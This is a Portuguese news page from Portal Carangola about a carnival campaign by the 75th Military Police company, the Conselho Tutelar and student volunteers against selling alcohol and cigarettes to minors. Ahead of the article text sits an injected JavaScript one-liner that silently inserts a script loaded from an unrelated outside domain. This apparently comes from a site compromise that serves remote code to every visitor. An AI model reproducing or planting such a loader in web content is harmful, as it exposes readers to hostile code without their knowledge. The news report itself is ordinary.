;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 75ª Cia Esp PM – Conselho Tutelar – JCC, realizaram no carnaval uma campanha de prevenção e combate a venda ilícita de bebidas alcoólicas e cigarros para menores. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

75ª Cia Esp PM – Conselho Tutelar – JCC, realizaram no carnaval uma campanha de prevenção e combate a venda ilícita de bebidas alcoólicas e cigarros para menores.

No Dia 17 de fevereiro, antes do início das festividades Carnavalescas, a 75ª Cia Esp PM juntamente com o Conselho Tutelar, com os integrantes do Programa Jovens Construindo a Cidadania – JCC da Escola Polivalente e da Escola Estadual João Belo de Oliveira, e com estudantes de Assistência Social, realizaram uma Campanha de Prevenção e Combate a Venda Ilícita de Bebidas e Cigarros para Menores.
Na oportunidade, estiveram na Avenida do Samba onde visitaram todas as barracas, bares e estabelecimentos que vendiam bebidas e cigarros orientando e advertindo todos os proprietários e funcionários, bem como distribuíram panfletos da PM contendo dicas de segurança, fixaram cartazes do Conselho Tutelar com informações acerca da proibição e consequências decorrentes da venda ilegal para crianças e adolescentes e também com os telefones de disk-denúncia, 190  / 3741-2999 / 181.
A Campanha teve ótima repercussão e excelentes resultados, tendo em vista que não houve nenhum registro de venda de bebidas e cigarros para menores durante as festividades do carnaval.
O Comandante da 75ª Cia Esp PM, Maj André de Sá, destacou a importância de ações como essa, nos moldes da doutrina e filosofia de Polícia Comunitária, na prevenção criminal, bem como, prevenção de todas as consequências decorrentes do uso indevido e abusivo de bebidas alcoólicas e cigarros. Conforme estatísticas, essas drogas, são a “porta de entrada” para as demais drogas, daí a importância da participação de todos no combate e na prevenção deste delito.


Ofertas


Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.